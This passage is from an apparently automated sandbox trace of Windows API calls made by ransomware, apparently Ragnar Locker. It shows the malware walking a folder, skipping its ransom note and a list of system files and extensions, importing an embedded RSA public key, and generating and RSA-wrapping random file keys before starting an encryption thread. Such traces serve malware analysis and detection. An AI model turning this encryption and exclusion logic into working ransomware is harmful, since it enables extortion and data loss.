lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0173.878] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0173.878] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0173.878] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547fc0 [0173.878] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0173.878] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf4f9056b, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.879] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0173.880] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0173.880] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4f9056b, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf4f9056b, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0173.880] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0173.880] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0173.880] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0173.880] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0173.880] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0173.880] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0173.880] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0173.880] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0173.880] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0173.880] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0173.880] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0173.880] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0173.880] FindClose (in: hFindFile=0x3547fc0 | out: hFindFile=0x3547fc0) returned 1 [0173.881] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547f00 [0173.881] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf4f9056b, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf4f9056b, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.882] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4f9056b, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf4f9056b, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0173.882] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0173.882] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0173.882] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1040\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0173.882] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0173.882] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0173.882] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0173.882] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0173.882] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf") returned=".rtf" [0173.882] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0173.882] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0173.883] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0173.883] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0173.883] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0173.883] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0173.883] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0173.883] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0173.883] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0173.883] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0173.883] GetProcessHeap () returned 0x3520000 [0173.883] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0173.884] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" [0173.884] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0173.885] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0173.885] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0173.885] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned=".xml" [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0173.885] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0173.885] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0173.885] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0173.885] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0173.885] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0173.885] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0173.885] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0173.885] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0173.885] GetProcessHeap () returned 0x3520000 [0173.885] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0173.887] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" [0173.887] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0173.887] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0173.887] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0173.887] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned=".dll" [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0173.887] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0173.887] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0173.887] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0173.887] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0173.887] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0173.887] GetProcessHeap () returned 0x3520000 [0173.887] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x35869a0 [0173.888] CryptAcquireContextW (in: phProv=0x35869a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x35869a0*=0x3556b28) returned 1 [0173.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0173.888] GetProcessHeap () returned 0x3520000 [0173.888] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358d160 [0173.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358d160, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0173.889] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0173.889] GetProcessHeap () returned 0x3520000 [0173.889] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0173.889] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0173.889] GetProcessHeap () returned 0x3520000 [0173.889] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358d160 | out: hHeap=0x3520000) returned 1 [0173.889] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0173.889] CryptImportPublicKeyInfo (in: hCryptProv=0x3556b28, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x35869a4 | out: phKey=0x35869a4*=0x3547f40) returned 1 [0173.889] GetProcessHeap () returned 0x3520000 [0173.889] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0173.889] LocalFree (hMem=0x35948f0) returned 0x0 [0173.889] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556bb0) returned 1 [0173.890] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0173.890] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0173.890] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0173.892] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556660) returned 1 [0173.893] CryptGenRandom (in: hProv=0x3556660, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0173.893] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0173.893] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0173.895] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556bb0) returned 1 [0173.895] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0173.895] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0173.896] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0173.897] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35564c8) returned 1 [0173.898] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0173.898] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0173.898] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0173.900] CryptEncrypt (in: hKey=0x3547f40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0173.901] GetLastError () returned 0x80090016 [0173.901] CryptEncrypt (in: hKey=0x3547f40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0173.901] GetLastError () returned 0x80090016 [0173.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x24c) returned 0x3b4 [0173.902] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556bb0) returned 1 [0173.903] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0173.903] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0173.903] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0173.906] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35564c8) returned 1 [0173.906] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0173.907] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0173.907] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0173.910] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35564c8) returned 1 [0173.911] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0173.911] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0173.911] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0173.914] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556660) returned 1 [0173.914] CryptGenRandom (in: hProv=0x3556660, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) 